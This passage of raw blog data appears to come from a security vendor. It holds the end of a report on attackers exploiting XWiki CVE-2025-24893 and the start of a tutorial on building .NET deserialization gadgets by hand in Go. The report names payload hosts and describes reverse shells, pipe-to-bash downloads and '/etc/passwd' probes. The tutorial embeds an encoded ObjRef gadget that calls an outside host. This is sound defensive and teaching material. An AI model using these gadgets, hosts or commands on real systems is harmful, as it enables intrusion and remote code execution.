servers","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Frondodox-botnet-exploits-react2shell-flaw-to-breach-nextjs-servers\u002F","2025-12-31",[30031],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":30033,"toc":30376},[30034,30037,30057,30062,30067,30073,30077,30080,30100,30104,30108,30119,30123,30127,30135,30151,30155,30159,30178,30182,30186,30190,30193,30209,30213,30217,30249,30253,30257,30261,30268,30281,30285,30289,30306,30310,30314,30322,30326,30330,30332,30342,30344,30359],[263,30035],{":list":30036,"ico":266,"title":20},"[\"Since our initial publication, exploitation has expanded quickly. Multiple independent attackers are now actively targeting CVE-2025-24893.\",\"The actor set is diverse. We’re seeing everything from botnets and coin-miners to custom tooling and bespoke scanners.\",\"Defenders need time, and early detection is the only way to get it. VulnCheck Canaries provide that early visibility before exploitation becomes widespread.\"]",[18,30038,30039,30040,30045,30046,30051,30052,30056],{},"On October 28, we published ",[1131,30041,30042],{},[47,30043,19428],{"href":19426,"rel":30044},[51]," detailing an attacker  abusing internet-exposed XWiki servers. Two days later, on October 30, ",[47,30047,30050],{"href":30048,"rel":30049},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-24893",[51],"CVE-2025-24893"," was added to ",[47,30053,30055],{"href":2864,"rel":30054},[51],"CISA Known Exploited Vulnerabilities"," (KEV). Since then, we’ve observed a noticeable uptick in exploit attempts.",[18,30058,30059],{},[295,30060,30061],{},"Canary Intelligence Observed CVE-2025-24893 Attacks (Oct. 28 - Nov. 
11, 2025)",[30063,30064],"line-chart",{":labels":30065,":series":30066},"[\"2025-10-28\",\"2025-10-29\",\"2025-10-30\",\"2025-10-31\",\"2025-11-01\",\"2025-11-02\",\"2025-11-03\",\"2025-11-04\",\"2025-11-05\",\"2025-11-06\",\"2025-11-07\",\"2025-11-08\",\"2025-11-09\",\"2025-11-10\",\"2025-11-11\"]","[{\"type\":\"line\",\"name\":\"Attacks\",\"data\":[2,4,2,23,4,4,16,10,26,69,124,20,16,36,99]}]",[18,30068,10402,30069,30072],{},[47,30070,283],{"href":281,"rel":30071},[51]," shows not only an increase in scanning activity but also a clear expansion of active exploitation. In the following sections, we’ll share some of what we’re seeing.",[61,30074,30076],{"id":30075},"attacks-with-secondary-payload","Attacks with Secondary Payload",[18,30078,30079],{},"We saw a sharp uptick in attacks when the RondoDox botnet added this vulnerability to its repertoire. The first RondoDox exploit was observed on November 3, 2025, and activity has grown steadily since.",[18,30081,30082,30083,30088,30089,30092,30093,30096,30097,4606],{},"These attacks are easily attributed to RondoDox based on its ",[47,30084,30087],{"href":30085,"rel":30086},"https:\u002F\u002Fitnext.io\u002Frondodox-v2-evolution-of-rondodox-botnet-with-650-more-exploits-b16427b17aea",[51],"well-known"," HTTP User-Agent and secondary payload naming convention (",[886,30090,30091],{},"rondo.\u003Cvalue>.sh","). The associated payload servers are also well documented. For example, ",[886,30094,30095],{},"74.194.191.52"," can be seen below in a RondoDox exploitation of ",[47,30098,30050],{"href":30048,"rel":30099},[51],[68,30101],{"src":30102,"alt":21258,"className":30103},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F1-light.png",[10876,21260],[68,30105],{"src":30106,"alt":21258,"className":30107},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F1-dark.png",[21265,21266],[18,30109,30110,30111,30114,30115,30118],{},"RondoDox isn’t the only actor exploiting this bug. 
Beginning on November 7, 2025, we observed ",[886,30112,30113],{},"172.245.241.123"," download a payload from ",[886,30116,30117],{},"ospwrf10ny.anondns[.]net"," and pipe it to bash. The payload is obfuscated. The attacker base64 encodes it, but it remains visible in the URL, as is typical with this vulnerability. Below is an example of that November 7 exploitation:",[68,30120],{"src":30121,"alt":21292,"className":30122},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F2-light.png",[10876,21260],[68,30124],{"src":30125,"alt":21292,"className":30126},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F2-dark.png",[21265,21266],[18,30128,30129,30130,27987],{},"The obfuscated payload downloads a secondary payload which in turn fetches and executes a coin miner (file hash: ",[47,30131,30134],{"href":30132,"rel":30133},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F03a77a556f074184b254d90e13cdd3a31efaa5a77640405e5f78aa462736acf7",[51],"03a77a556f074184b254d90e13cdd3a31efaa5a77640405e5f78aa462736acf7",[18,30136,30137,30138,30141,30142,30145,30146,59],{},"There is no lack of coin miner activity. On November 7, 2025, ",[886,30139,30140],{},"156.146.56.131"," fetched a secondary payload from ",[886,30143,30144],{},"47.236.194.231:81"," (the host is now offline). The secondary payload was executed in a second-pass exploit, as discussed in ",[1131,30147,30148],{},[47,30149,19428],{"href":19426,"rel":30150},[51],[68,30152],{"src":30153,"alt":21314,"className":30154},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F3-light.png",[10876,21260],[68,30156],{"src":30157,"alt":21314,"className":30158},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F3-dark.png",[21265,21266],[18,30160,30161,30162,30167,30168,982,30171,30174,30175,59],{},"The attacker from ",[1131,30163,30164],{},[47,30165,19428],{"href":19426,"rel":30166},[51],", appears to have expanded their efforts. 
In addition to the two IP addresses documented previously, they’ve added new payload hosting servers at ",[886,30169,30170],{},"185.142.33.151",[886,30172,30173],{},"90.156.218.31",". They’re also now launching exploits from ",[886,30176,30177],{},"172.206.196.45",[68,30179],{"src":30180,"alt":21330,"className":30181},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F4-light.png",[10876,21260],[68,30183],{"src":30184,"alt":21330,"className":30185},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F4-dark.png",[21265,21266],[61,30187,30189],{"id":30188},"reverse-shells","Reverse Shells",[18,30191,30192],{},"We’ve also observed several reverse shell attempts. These may indicate \"hands-on-keyboard\" activity, or they could represent a different form of automation intended to avoid HTTP-based communication.",[18,30194,30195,30196,30199,30200,30203,30204,30208],{},"On October 31, 2025, ",[886,30197,30198],{},"18.228.3.224"," attempted to establish a reverse shell back to itself using the BusyBox ",[886,30201,30202],{},"nc"," binary. Unlike many of the addresses we’ve talked about so far, ",[47,30205,30198],{"href":30206,"rel":30207},"https:\u002F\u002Fwww.abuseipdb.com\u002Fcheck\u002F18.228.3.224",[51]," is notable in that it's an AWS-associated IP address with no clear history of abuse. We’ll revisit this address’s scanning behavior in the next section, but it likely represents a more targeted attack.",[68,30210],{"src":30211,"alt":21345,"className":30212},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F5-light.png",[10876,21260],[68,30214],{"src":30215,"alt":21345,"className":30216},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F5-dark.png",[21265,21266],[18,30218,30219,30220,30223,30224,30227,30228,30232,30233,30237,30238,30243,30244,59],{},"Among the other reverse shell attempts we saw, on November 11, 2025 ",[886,30221,30222],{},"118.99.141.178"," attempted to establish a bash reverse shell to ",[886,30225,30226],{},"155.138.212.170:9001",". 
The source host, ",[47,30229,30222],{"href":30230,"rel":30231},"https:\u002F\u002Fen.fofa.info\u002Fcaptcha?redirect=%2Fresult%3Fqbase64%3DMTE4Ljk5LjE0MS4xNzg%253D",[51],", is notable because it exposes both QNAP and DrayTek interfaces to the internet, suggesting that this could be an exploited host. This assessment is supported by our ",[47,30234,30236],{"href":1249,"rel":30235},[51],"IP Intel"," product, which had been ",[47,30239,30242],{"href":30240,"rel":30241},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fipintel-10d?cidr=118.99.141.178\u002F32",[51],"tracking"," the address as potentially vulnerable to QNAP’s ",[47,30245,30248],{"href":30246,"rel":30247},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-47218",[51],"CVE-2023-47218",[68,30250],{"src":30251,"alt":21422,"className":30252},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F6-light.png",[10876,21260],[68,30254],{"src":30255,"alt":21422,"className":30256},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F6-dark.png",[21265,21266],[61,30258,30260],{"id":30259},"scanners-and-probing","Scanners and Probing",[18,30262,30263,30264,30267],{},"Beyond reverse shells, plenty of actors are simply looking for targets, which is why we’ve seen a variety of scanners and probes from attackers. The most interesting one is an out-of-band application security testing (OAST)-based scanner using ",[886,30265,30266],{},"oast.fun",", often associated with Nuclei and similar tools. This sort of traffic usually makes analysts’ eyes glaze over due to the sheer volume of internet-wide probing.",[18,30269,30270,30271,30273,30274,30277,30278,30280],{},"However, one ",[886,30272,30266],{}," payload we captured stood out for two reasons. First, as we will see, the Nuclei template for ",[47,30275,30050],{"href":30048,"rel":30276},[51]," doesn’t use an OAST-based check, suggesting the payload came from a less common tool. 
Second, the attacker, ",[886,30279,30198],{},", also attempted a reverse shell (see the previous section), indicating this activity may be more deliberate than routine scanning.",[68,30282],{"src":30283,"alt":21507,"className":30284},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F7-light.png",[10876,21260],[68,30286],{"src":30287,"alt":21507,"className":30288},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F7-dark.png",[21265,21266],[18,30290,30291,30292,30297,30298,30301,30302,30305],{},"Of course, we’ve seen an increase in Nuclei scans as well. The Nuclei ",[47,30293,30296],{"href":30294,"rel":30295},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fblob\u002Fmain\u002Fhttp\u002Fcves\u002F2025\u002FCVE-2025-24893.yaml",[51],"template"," for ",[47,30299,30050],{"href":30048,"rel":30300},[51]," outputs the results of ",[886,30303,30304],{},"cat \u002Fetc\u002Fpasswd",". We see quite a bit of this from many sources:",[68,30307],{"src":30308,"alt":21661,"className":30309},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F8-light.png",[10876,21260],[68,30311],{"src":30312,"alt":21661,"className":30313},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F8-dark.png",[21265,21266],[18,30315,30316,30317,1246,30319,30321],{},"We also observed probes using ",[886,30318,26412],{},[886,30320,22876],{},", and just generic printing of “EXPLOIT_SUCCESS.” All are viable approaches, but a bit off the beaten Nuclei path.",[68,30323],{"src":30324,"alt":22955,"className":30325},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F9-light.png",[10876,21260],[68,30327],{"src":30328,"alt":22955,"className":30329},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F9-dark.png",[21265,21266],[61,30331,1903],{"id":1902},[18,30333,30334,30337,30338,30341],{},[47,30335,30050],{"href":30048,"rel":30336},[51]," is a familiar story: one attacker moves first, and many follow. 
Within days of the initial exploitation, we saw botnets, miners, and opportunistic scanners all adopting the same vulnerability. Once again, this highlights the gap between exploitation in the wild and visibility at scale. By the time an issue lands in CISA KEV, attackers are already days ahead, and early detection remains the only real advantage defenders have. VulnCheck’s ",[47,30339,283],{"href":281,"rel":30340},[51]," caught these attacks before they reached broader awareness, giving defenders a chance to respond before exploitation became widespread.",[61,30343,202],{"id":201},[18,30345,29952,30346,1246,30349,1255,30354,59],{},[47,30347,19428],{"href":19426,"rel":30348},[51],[47,30350,30353],{"href":30351,"rel":30352},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Foctober-2025-research-highlights",[51],"VulnCheck Research Highlights: October 2025",[47,30355,30358],{"href":30356,"rel":30357},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fnew-citrix-netscaler-zero-day-vulnerability-exploited-in-the-wild",[51],"New Citrix NetScaler Zero-Day Vulnerability Exploited in the Wild",[18,30360,1228,30361,1234,30364,1240,30367,1246,30370,1255,30373,1260],{},[47,30362,1233],{"href":10806,"rel":30363},[51],[47,30365,1239],{"href":1237,"rel":30366},[51],[47,30368,1245],{"href":1243,"rel":30369},[51],[47,30371,1251],{"href":1249,"rel":30372},[51],[47,30374,216],{"href":1258,"rel":30375},[51],{"title":219,"searchDepth":220,"depth":220,"links":30377},[30378,30379,30380,30381,30382],{"id":30075,"depth":220,"text":30076},{"id":30188,"depth":220,"text":30189},{"id":30259,"depth":220,"text":30260},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"What began as one attacker exploiting CVE-2025-24893 has become a multi-actor scramble including botnets, miners, and custom tooling. 
Our early Canary detections show how quickly real-world exploitation now evolves.",{"slug":30385},"xwiki-under-increased-attack","\u002Fblog\u002Fxwiki-under-increased-attack",{"title":10801,"description":30383},"blog\u002Fxwiki-under-increased-attack",[2941,242,1281,1279],"1PnTmsKFw9Qx8PCKgygkGuq7B3vGU_CT9aZXPrBRFVs",{"id":30392,"title":30393,"articles":7,"authors":30394,"body":30396,"date":31224,"description":31225,"extension":234,"image":7,"link":7,"meta":31226,"navigation":237,"path":31228,"seo":31229,"series":7,"stem":31230,"subtype":7,"tags":31231,"__hash__":31232},"blog\u002Fblog\u002Fmaking-dotnet-gadgets.md","Making Serialization Gadgets by Hand - .NET",[30395],{"name":13183,"avatar":13184,"link":13185,"linkName":13186},{"type":15,"value":30397,"toc":31206},[30398,30402,30423,30425,30436,30440,30447,30450,30457,30460,30464,30467,30482,30486,30495,30503,30506,30512,30520,30524,30527,30548,30554,30558,30561,30564,30571,30591,30608,30614,30618,30625,30628,30634,30644,30650,30653,30657,30660,30666,30670,30677,30683,30691,30695,30703,30706,30712,30724,30743,30746,30753,30759,30763,30766,30772,30776,30788,30791,30797,30807,30811,30816,30820,30826,30829,30832,30839,30843,30851,30854,30860,30863,30871,30884,30887,30891,30894,30897,30915,30922,30929,30947,30951,30954,30961,30976,30979,30985,30999,31003,31006,31012,31015,31021,31070,31077,31089,31092,31098,31101,31122,31135,31139,31146,31150,31157,31161,31164,31170,31174,31182,31184,31186,31203],[61,30399,30401],{"id":30400},"go-exploits-new-net-deserialization-library","Go-Exploit's New .NET Deserialization Library",[18,30403,30404,30405,30408,30409,30413,30414,30418,30419,59],{},"Recently our ",[47,30406,1245],{"href":1243,"rel":30407},[51]," team added a .NET deserialization payload generation library to ",[47,30410,20558],{"href":30411,"rel":30412},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002F",[51],", VulnCheck's open-source exploit framework. 
This article discusses how that library came to be while providing enough information into that process to allow others to create their own gadget chains by hand if they so please. At ",[47,30415,30417],{"href":30416},"#usage","the end",", we discuss how to use the new go-exploit library to generate deserialization payloads (without the need for Windows), or for integration in your own Golang-based exploits, regardless of whether or not they use go-exploit. Our library is designed to be used \"out of the box\" by any Go program without needing to define or set up any special objects. You can learn more about the advantages of go-exploit ",[47,30420,305],{"href":30421,"rel":30422},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fgo-exploit",[51],[61,30424,13194],{"id":13191},[22,30426,30427,30430,30433],{},[25,30428,30429],{},"Challenges of adding deserialization payloads into exploits",[25,30431,30432],{},"How to create your own deserialization library, including a technical breakdown of .NET serialization streams",[25,30434,30435],{},"How to use VulnCheck's own .NET deserialization library for golang-based exploits",[61,30437,30439],{"id":30438},"challenges-of-deserialization-gadgets-in-payloads","Challenges of Deserialization Gadgets in Payloads",[18,30441,30442,30443,30446],{},"When you are writing .NET deserialization exploits in a language other than C# and you want dynamic parameters in your payload, your options are generally limited to \"shelling out\" to ysoserial.net or pasting in a binary array that was ",[1131,30444,30445],{},"created"," by ysoserial.net and then editing it at runtime.",[18,30448,30449],{},"Neither of these options is great. The first option demands that you use a specific program on a specific operating system (Windows) to create the gadgets. 
The second option is prone to mistakes due to the length encoding of strings and certain records being incorrectly implemented; it also makes the payload less modifiable\u002Fclean.",[18,30451,30452,30453,30456],{},"We instead opt for a third option: to create the .NET gadgets \"by hand\" for our golang-based exploit framework, ",[47,30454,20558],{"href":30411,"rel":30455},[51],".\nIn doing so, we learned a great deal about the .NET serialization stream structure and will present it in this article to help those wishing to do something similar in their own framework or anyone just wanting to learn more about serialization streams.",[18,30458,30459],{},"Though this article is written in the context of golang, the same ideas should be transferable to any other language.",[61,30461,30463],{"id":30462},"what-are-net-gadgets-made-of","What Are .NET Gadgets Made Of?",[18,30465,30466],{},"I am going to show how .NET deserialization objects are broken down by looking at what their sub-components are and how they are constructed during serialization. After that I will show you how to create your own serialization library that would allow you to recreate these gadgets in any language. Finally, I will show how to use gadgets directly from the new go-exploit library.",[18,30468,30469,30470,30475,30476,30481],{},".NET deserialization payloads are effectively a stream of \"",[47,30471,30474],{"href":30472,"rel":30473},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002F954a0657-b901-4813-9398-4ec732fe8b32",[51],"Records","\" which can be thought of as ",[47,30477,30480],{"href":30478,"rel":30479},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FStruct_(C_programming_language)",[51],"structs",". 
Given that records are effectively structs, it makes sense that to create gadgets, we should make structs and then place them in a byte array such that we produce a sane gadget at the end.",[993,30483,30485],{"id":30484},"the-first-record-serializationheaderrecord","The First Record: SerializationHeaderRecord",[18,30487,30488,30489,30494],{},"Throughout this tutorial we will be using an ObjRef gadget, viewable using ",[47,30490,30493],{"href":30491,"rel":30492},"https:\u002F\u002Fgchq.github.io\u002FCyberChef\u002F#recipe=From_Hex('Auto')To_Hexdump(16,false,false,false)&input=MDAwMTAwMDAwMGZmZmZmZmZmMDEwMDAwMDAwMDAwMDAwMDA0MDEwMDAwMDAxMDUzNzk3Mzc0NjU2ZDJlNDU3ODYzNjU3MDc0Njk2ZjZlMDEwMDAwMDAwOTQzNmM2MTczNzM0ZTYxNmQ2NTAzMWU1Mzc5NzM3NDY1NmQyZTUyNzU2ZTc0Njk2ZDY1MmU1MjY1NmQ2Zjc0Njk2ZTY3MmU0ZjYyNmE1MjY1NjYwOTAyMDAwMDAwMDQwMjAwMDAwMDFlNTM3OTczNzQ2NTZkMmU1Mjc1NmU3NDY5NmQ2NTJlNTI2NTZkNmY3NDY5NmU2NzJlNGY2MjZhNTI2NTY2MDEwMDAwMDAwMzc1NzI2YzAxMDYwMzAwMDAwMDIwNjg3NDc0NzAzYTJmMmYzMTM5MzIyZTMxMzYzODJlMzUzMTJlMzEzNTNhMzgzODM4MzgyZjY4NjM1MTYxNDE1NDBi",[51],"this cyberchef link",". 
I chose this gadget because it is small and simple; other gadgets are generally much larger.",[18,30496,30497,30498,59],{},"The very first record we will look at in the stream is a static record that begins every serialized .NET stream, the ",[47,30499,30502],{"href":30500,"rel":30501},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002Fa7e578d3-400a-4249-9424-7529d10d1b3c",[51],"SerializationHeaderRecord",[18,30504,30505],{},"Here is the hex dump for the SerializationHeaderRecord:",[1354,30507,30510],{"className":30508,"code":30509,"language":1359},[1357],"00000000  00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00  |.....ÿÿÿÿ.......|\n00000010  00                                               |.|\n",[886,30511,30509],{"__ignoreMap":219},[18,30513,30514,30515,30519],{},"According to the ",[47,30516,30518],{"href":30500,"rel":30517},[51],"documentation"," above: \"The SerializationHeaderRecord record MUST be the first record in a binary serialization. 
This record has the major and minor version of the format and the IDs of the top object and the headers.\"",[14603,30521,30523],{"id":30522},"quick-tip-reading-the-microsoft-documentation","Quick Tip: Reading the Microsoft Documentation",[18,30525,30526],{},"Almost every link in this article will be to Microsoft documentation and while I am certain that you know how to read given that you've made it this far, I have dropped a few tips below to ease interpretation of these pages for those who are unfamiliar with the format.",[22,30528,30529,30532,30539,30542,30545],{},[25,30530,30531],{},"There is a table representing the layout of the record; I find this table more confusing than helpful so you may want to consider ignoring it (see image below for clarification).",[25,30533,30534,30535,30538],{},"The information ",[1131,30536,30537],{},"beneath"," the table that breaks down each member of the struct is typically much more useful and easier to read.",[25,30540,30541],{},"The member information in the documentation is in the same order that the members appear within the records.",[25,30543,30544],{},"You can assume all INT32 values are little-endian.",[25,30546,30547],{},"It is important to read all member descriptions.",[18,30549,30550],{},[68,30551],{":width":10862,"alt":30552,"src":30553},"msdn","\u002Fblog\u002Fmaking-dotnet-gadgets\u002Fmsdn.png",[14603,30555,30557],{"id":30556},"recordtypeenum-1-byte","RecordTypeEnum (1 byte)",[18,30559,30560],{},"Now that we know how to decipher the Microsoft docs, let's get on to the first member in the record, RecordTypeEnum.",[18,30562,30563],{},"The description for this member reads: \"RecordTypeEnum (1 byte): A RecordTypeEnumeration value that identifies the record type. The value MUST be 0.\"",[18,30565,30566,30567,30570],{},"When reversing serialized streams on your own for reconstruction, this byte is the first byte you will see for a given record and it tells you what record is coming next. 
In this case, we saw a ",[886,30568,30569],{},"00",", so we know a SerializationHeaderRecord is coming.",[18,30572,30573,30574,30577,30578,30582,30583,30587,30588,30590],{},"Every record type has its own ",[886,30575,30576],{},"RecordTypeEnum"," that is 1 byte, and each record has a different number that is sequential based on their order in the ",[47,30579,30581],{"href":30472,"rel":30580},[51],"RecordTypeEnumeration",". That ",[47,30584,30586],{"href":30472,"rel":30585},[51],"link"," contains a list of all the record types, of which only a subset have been useful for payloads, having written about a dozen or so gadgets by hand. With that said, I would ",[1131,30589,6881],{}," suggest going ahead and implementing every gadget, but rather build them as needed.",[18,30592,30593,30594,30596,30597,30602,30603,30607],{},"So for a SerializationHeaderRecord, this value will ALWAYS be ",[886,30595,30569],{}," in hexidecimal, so we should represent this as a constant somewhere in our code. In the Microsoft docs you see that RecordTypeEnumeration is exactly that, an enum, so we should just make an enum for record types in our code. I am using Golang, which does not have have enums natively, and while there are ",[47,30598,30601],{"href":30599,"rel":30600},"https:\u002F\u002Fgobyexample.com\u002Fenums",[51],"methods for creating them in go",", I will just use a string map because that will serve my purposes just fine here. 
Using the ",[47,30604,30606],{"href":30472,"rel":30605},[51],"Microsoft docs"," as reference, it looks something like this:",[1354,30609,30612],{"className":30610,"code":30611,"language":1359},[1357],"var RecordTypeEnumMap = map[string]int{\n \"SerializedStreamHeader\":         0,\n \"ClassWithId\":                    1,\n \"SystemClassWithMembers\":         2,\n \"ClassWithMembers\":               3,\n \"SystemClassWithMembersAndTypes\": 4,\n \"ClassWithMembersAndTypes\":       5,\n \"BinaryObjectString\":             6,\n \"BinaryArray\":                    7,\n \"MemberPrimitiveTyped\":           8,\n \"MemberReference\":                9,\n \"ObjectNull\":                     10,\n \"MessageEnd\":                     11,\n \"BinaryLibrary\":                  12,\n \"ObjectNullMultiple256\":          13,\n \"ObjectNullMultiple\":             14,\n \"ArraySinglePrimitive\":           15,\n \"ArraySingleObject\":              16,\n \"ArraySingleString\":              17,\n \"MethodCall\":                     21,\n \"MethodReturn\":                   22,\n}\n",[886,30613,30611],{"__ignoreMap":219},[14603,30615,30617],{"id":30616},"rootid-4-bytes","RootId (4 bytes)",[18,30619,30620,30621,30624],{},"The next member is RootId (4 bytes), which is described as \"An INT32 value (as specified in ",[1373,30622,30623],{},"MS-DTYP"," section 2.2.22) that identifies the root of the graph of nodes.\"",[18,30626,30627],{},"This is a variable value, so let's add it to the struct as an int. 
Remember that we did not add RecordTypeEnum because this is a constant\u002Fstatic value.",[1354,30629,30632],{"className":30630,"code":30631,"language":1359},[1357],"\u002F\u002F The start of our SerializationHeaderRecord struct\ntype SerializationHeaderRecord struct {\n    RootID int\n}\n",[886,30633,30631],{"__ignoreMap":219},[18,30635,30636,30637,30639,30640,30643],{},"Remembering that all INT32 values are little-endian, and knowing that this is a ",[886,30638,467],{}," from the hex dump, we know we need to have this member output ",[886,30641,30642],{},"\\x01\\x00\\x00\\x00",". With that, we can start making some methods for our struct to produce the binary output for this record:",[1354,30645,30648],{"className":30646,"code":30647,"language":1359},[1357],"\u002F\u002F NOTE: SerializationHeaderRecord struct is still incomplete\nvar RecordTypeEnumMap = map[string]int{\n \"SerializedStreamHeader\":         0,\n ... \u002F\u002F omitted for brevity\n}\ntype SerializationHeaderRecord struct {\n    RootID int\n}\nfunc (serializationHeaderRecord SerializationHeaderRecord) RecordToBin() (string, bool) {\n recordTypeEnumString := string(byte(RecordTypeEnumMap[\"SerializedStreamHeader\"]))\n rootIDString := transform.PackLittleInt32(serializationHeaderRecord.RootID)\n return recordTypeEnumString + rootIDString, true\n}\nshr := SerializationHeaderRecord{ RootID: 1 }\nshr.RecordToBin() \u002F\u002F should yield \"\\x00\\x01\\x00\\x00\\x00\" at this time\n",[886,30649,30647],{"__ignoreMap":219},[18,30651,30652],{},"This is the basic idea and structure of how to create these records and ultimately turn them into binary streams. Convert enough records into binary streams in the right order and you have a finished serialization stream!",[14603,30654,30656],{"id":30655},"headerid-4-bytes","HeaderId (4 bytes)",[18,30658,30659],{},"Continuing on, the next member is the HeaderId, which, much like the previous member, is described as a variable INT32 value. 
We will add this to the struct as an int:",[1354,30661,30664],{"className":30662,"code":30663,"language":1359},[1357],"type SerializationHeaderRecord struct {\n RootID   int\n HeaderID int\n}\n",[886,30665,30663],{"__ignoreMap":219},[14603,30667,30669],{"id":30668},"majorversion-4-bytes-and-minorversion-4-bytes","MajorVersion (4 bytes) and MinorVersion (4 bytes)",[18,30671,30672,30673,30676],{},"The MajorVersion and MinorVersion are a little different from the last two members as they MUST be 1 and 0 respectively.\nWe do not need to add them to the struct, but instead just update the ",[886,30674,30675],{},"RecordToBin"," method for this struct to finish off our implementation of this record.",[1354,30678,30681],{"className":30679,"code":30680,"language":1359},[1357],"\u002F\u002F Every record type implements this so records can be collected and serialized in order\ntype Record interface {\n RecordToBin() (string, bool)\n}\n\nvar RecordTypeEnumMap = map[string]int{\n \"SerializedStreamHeader\":         0,\n ... \u002F\u002F omitted for brevity\n}\n\ntype SerializationHeaderRecord struct {\n    RootID int\n    HeaderID int\n}\n\nfunc (serializationHeaderRecord SerializationHeaderRecord) RecordToBin() (string, bool) {\n recordTypeEnumString := string(byte(RecordTypeEnumMap[\"SerializedStreamHeader\"])) \u002F\u002F 0\n rootIDString := transform.PackLittleInt32(serializationHeaderRecord.RootID)\n headerIDString := transform.PackLittleInt32(serializationHeaderRecord.HeaderID)\n majorVersion := transform.PackLittleInt32(1) \u002F\u002F MUST be 1\n minorVersion := transform.PackLittleInt32(0) \u002F\u002F MUST be 0\n return recordTypeEnumString + rootIDString + headerIDString + majorVersion + minorVersion, true\n}\n\nshr := SerializationHeaderRecord{RootID: 1, HeaderID: -1}\n\nshr.RecordToBin() \u002F\u002F should yield \"\\x00\\x01\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\u002F\u002F add it to the full gadget being built\nvar gadgetRecords []Record\ngadgetRecords = append(gadgetRecords, shr) \u002F\u002F adding serialization 
header record to the gadget\n",[886,30682,30680],{"__ignoreMap":219},[18,30684,30685,30686,59],{},"Note: The code snippet above and all others in this article are for informational purposes and are not guaranteed to be complete\u002Fvalid code. Remember, if you need a fully working library to reference or use as is, see ",[47,30687,30690],{"href":30688,"rel":30689},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Ftree\u002Fmain\u002Fdotnet",[51],"go-exploit's dotnet deserialization package",[993,30692,30694],{"id":30693},"systemclasswithmembersandtypes-record","SystemClassWithMembersAndTypes Record",[18,30696,30697,30698,59],{},"Now things get a bit more interesting with the very next record in the stream, ",[47,30699,30702],{"href":30700,"rel":30701},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002Fecb47445-831f-4ef5-9c9b-afd4d06e3657",[51],"SystemClassWithMembersAndTypes",[18,30704,30705],{},"Here is the hex dump for SystemClassWithMembersAndTypes:",[1354,30707,30710],{"className":30708,"code":30709,"language":1359},[1357],"00000010  __ 04 01 00 00 00 10 53 79 73 74 65 6d 2e 45 78  |......System.Ex|\n00000020  63 65 70 74 69 6f 6e 01 00 00 00 09 43 6c 61 73  |ception.....Clas|\n00000030  73 4e 61 6d 65 03 1e 53 79 73 74 65 6d 2e 52 75  |sName..System.Ru|\n00000040  6e 74 69 6d 65 2e 52 65 6d 6f 74 69 6e 67 2e 4f  |ntime.Remoting.O|\n00000050  62 6a 52 65 66 09 02 00 00 00                    |bjRef.....      |\n",[886,30711,30709],{"__ignoreMap":219},[18,30713,2245,30714,30717,30718,30723],{},[47,30715,30702],{"href":30700,"rel":30716},[51]," record starts at offset 0x11. This is sort of the \"main\" record that you will see in .NET gadgets, or its alternative, ",[47,30719,30722],{"href":30720,"rel":30721},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002F847b0b6a-86af-4203-8ed0-f84345f845b9",[51],"ClassWithMembersAndTypes",". 
By main record I mean the record that actually defines the object\u002Fclass that is intended to be deserialized, which is sort of the \"point\" of a serialization stream. The difference between the two types above (SystemClassWithMembersAndTypes and ClassWithMembersAndTypes) is that the SystemClassWithMembersAndTypes is missing a LibraryID, as it is implicitly understood to be a system class and does not need it explicitly defined. Otherwise, these two records are the same.",[18,30725,30726,30727,7873,30732,30737,30738,30742],{},"These class records are quite verbose as they are primarily composed of two other (non-record) data structures: a ",[47,30728,30731],{"href":30729,"rel":30730},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002F0a192be0-58a1-41d0-8a54-9c91db0ab7bf",[51],"ClassInfo",[47,30733,30736],{"href":30734,"rel":30735},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002Faa509b5a-620a-4592-a5d8-7e9613e0a03e",[51],"MemberTypeInfo",". Viewing ",[47,30739,30741],{"href":30700,"rel":30740},[51],"the documentation",", we again see a RecordTypeEnum indicating that this is a SystemClassWithMembersAndTypes record, which in this case must be a 4. 
